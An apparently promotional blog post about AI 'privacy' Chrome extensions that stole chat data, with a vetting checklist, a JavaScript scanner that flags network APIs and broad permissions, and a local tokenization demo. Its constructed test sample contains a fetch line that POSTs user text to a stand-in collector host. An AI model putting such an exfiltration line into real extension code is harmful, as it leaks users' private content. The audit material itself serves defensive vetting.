Last updated 2026-04-19


Is Your AI Privacy Tool Stealing Your Data?

67% of AI Chrome extensions collect user data. The December 2025 incidents saw 900K users affected by extensions posing as privacy tools.

April 19, 2026 · 8 min read
Tags: privacy extension verification, local processing trust, extension data collection audit, AI privacy tool evaluation, Chrome extension security checklist

The Privacy Tool That Steals Data

In December 2025, Chrome tools distributed as AI privacy guards were caught spying. They captured complete conversation histories. They passed that content to attacker-controlled servers.

That is the core paradox: the privacy tool became the threat.

Caviard.ai found that 67% of AI Chrome extensions collect user data. Some disclose it. Others do not. But disclosure is not the real problem. The real problem is whether the tool's architecture makes data theft impossible by design -- or merely prohibited by policy.

DLA Piper's 2025 GDPR report found a 34% increase in the average fine amount in 2024 versus 2023. That trend raises the stakes for any data protection officer approving browser tools for employees.

What Real Local Processing Looks Like

A genuine local-processing tool runs its detection model inside the browser. The model is bundled with the install or downloaded once. After that, content never goes to the publisher's servers.

The only outbound traffic is the de-identified text sent to the AI service and routine browser requests such as update checks. Content never crosses the publisher's network.

This architecture can be tested and verified. Publisher promises cannot be trusted on their own. The December 2025 incidents proved that.

How to Vet Any Privacy Tool

Don't ask whether the publisher promises privacy. Ask whether the architecture makes data theft impossible.

Network test: Install the tool on a monitored network. Paste fake personal identifiers into a test AI account. Watch all outbound connections for 30 seconds. If any traffic goes to a domain that is not the AI platform or the tool's update server, your content is being routed elsewhere.

Code audit: Chrome extensions are JavaScript bundles. They can be inspected. A genuine local-processing tool has no network calls in its detection code. No fetch, no XMLHttpRequest, no WebSocket in the detection module is a good sign. Their presence is disqualifying.

Permission audit: Chrome Manifest V3 requires explicit permissions. A local-processing tool needs no permission to send content out of the browser. Clipboard access combined with broad network permissions -- without a clear reason -- is a red flag.

Publisher check: Verified publisher status on the Chrome Web Store requires domain verification and identity documentation. New publishers with new domains selling AI privacy tools warrant extra scrutiny. The December 2025 attackers used short-lived identities to evade detection.
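
The code audit and permission audit above can be scripted before a tool is approved. The following is an added example, not code from the original page or from any vendor; the function names, the sample manifest and the sample source files are constructed for illustration.

```javascript
// Added example: static checks on an unpacked extension. Sample data is constructed.
// fetch / XMLHttpRequest / WebSocket come from the checklist; sendBeacon and
// EventSource are added here as further browser network APIs.
const NETWORK_APIS = {
  fetch: /\bfetch\s*\(/,
  XMLHttpRequest: /\bXMLHttpRequest\b/,
  WebSocket: /\bWebSocket\b/,
  sendBeacon: /\bsendBeacon\b/,
  EventSource: /\bEventSource\b/,
};
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Code audit: report every line that references a network-capable API.
// A plain-text scan misses obfuscated or dynamically built calls, so a clean
// result still needs the network test to confirm it.
function scanSources(files) {
  const findings = [];
  for (const [file, src] of Object.entries(files)) {
    src.split('\n').forEach((text, i) => {
      for (const [api, re] of Object.entries(NETWORK_APIS)) {
        if (re.test(text)) findings.push({ file, line: i + 1, api });
      }
    });
  }
  return findings;
}

// Permission audit: broad host access, alone and combined with clipboard access.
function auditManifest(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.optional_permissions || [])];
  const hosts = [...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || [])];
  const broad = hosts.filter((h) => BROAD_HOSTS.has(h));
  const clipboard = perms.filter((p) => p.startsWith('clipboard'));
  const flags = [];
  if (broad.length) flags.push(`broad host access: ${broad.join(', ')}`);
  if (broad.length && clipboard.length) flags.push(`clipboard with broad hosts: ${clipboard.join(', ')}`);
  return flags;
}

// Constructed sample: a "privacy" extension whose detection module makes a network call.
const sampleManifest = { manifest_version: 3, permissions: ['clipboardRead', 'storage'],
  host_permissions: ['<all_urls>'] };
const sampleFiles = {
  'detector.js': 'function detect(t) {\n  fetch("https://collector.example/u", { method: "POST", body: t });\n  return [];\n}',
  'ui.js': 'document.title = "Shield";',
};
console.log(auditManifest(sampleManifest));
console.log(scanSources(sampleFiles));
```
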

900,000 Users Affected

Astrix Security's December 2025 analysis found 900,000 users affected by extensions posing as privacy tools. Those users chose these tools to protect their AI sessions. The tools did the opposite.

A single compromised employee session can expose customer records, legal files, and internal plans. The security and compliance overview explains how that risk chain works.

Choosing a Tool You Can Verify

The anonym.legal Chrome extension performs PII detection entirely inside the browser. Nothing is sent to anonym.legal servers at any time.

| | Malicious extensions | anonym.legal |
|---|---|---|
| Processing | Remote servers | Browser only |
| Access scope | Captures the entire session | Only while active |
| Verifiable by the user | No | Yes -- run the network test |

How it works:

  1. You paste text containing personal identifiers
  2. Detection runs inside your browser
  3. Names and identifiers become tokens -- "Juma Mwangi" becomes [PERSON_1]
  4. The sanitized text goes to the AI
  5. The AI's response is returned to you locally
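
The five steps above amount to a reversible token mapping that stays on the client. The following is an added illustration, not anonym.legal's code; the regex detectors, the known-name list and the sample sentence are constructed stand-ins for a real detection model.

```javascript
// Added example: reversible tokenization held in client memory.
// DETECTORS and knownNames are constructed stand-ins for a real PII model.
const DETECTORS = [
  { type: 'EMAIL', re: /[\w.+-]+@[\w-]+(?:\.[\w-]+)+/g },
  { type: 'PHONE', re: /\+\d[\d\s-]{7,}\d/g },
];

function tokenize(text, knownNames = []) {
  const byValue = new Map(); // original value -> token (same value, same token)
  const vault = new Map();   // token -> original value; kept on the client only
  const counters = {};
  const tokenFor = (type, value) => {
    if (!byValue.has(value)) {
      counters[type] = (counters[type] || 0) + 1;
      const token = `[${type}_${counters[type]}]`;
      byValue.set(value, token);
      vault.set(token, value);
    }
    return byValue.get(value);
  };
  let out = text;
  // Longest names first, so a full name is replaced before any shorter overlap.
  for (const name of [...knownNames].sort((a, b) => b.length - a.length)) {
    if (out.includes(name)) out = out.split(name).join(tokenFor('PERSON', name));
  }
  for (const { type, re } of DETECTORS) {
    out = out.replace(re, (m) => tokenFor(type, m));
  }
  return { sanitized: out, vault };
}

// Step 5: put the originals back into the AI's reply using the local vault.
// Tokens that are not in the vault are left untouched.
function restore(reply, vault) {
  return reply.replace(/\[[A-Z]+_\d+\]/g, (t) => vault.get(t) ?? t);
}

// Constructed sample input.
const input = 'Juma Mwangi (juma@example.org) asked that Juma Mwangi be called on +254 700 000 000.';
const { sanitized, vault } = tokenize(input, ['Juma Mwangi']);
console.log(sanitized);
console.log(restore('Draft a reply to [PERSON_1] at [EMAIL_1].', vault));
```

Only `sanitized` is meant to leave the browser; the vault that maps tokens back to real values is never serialized or sent.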

The compliance center covers the full entity list and enterprise audit details.

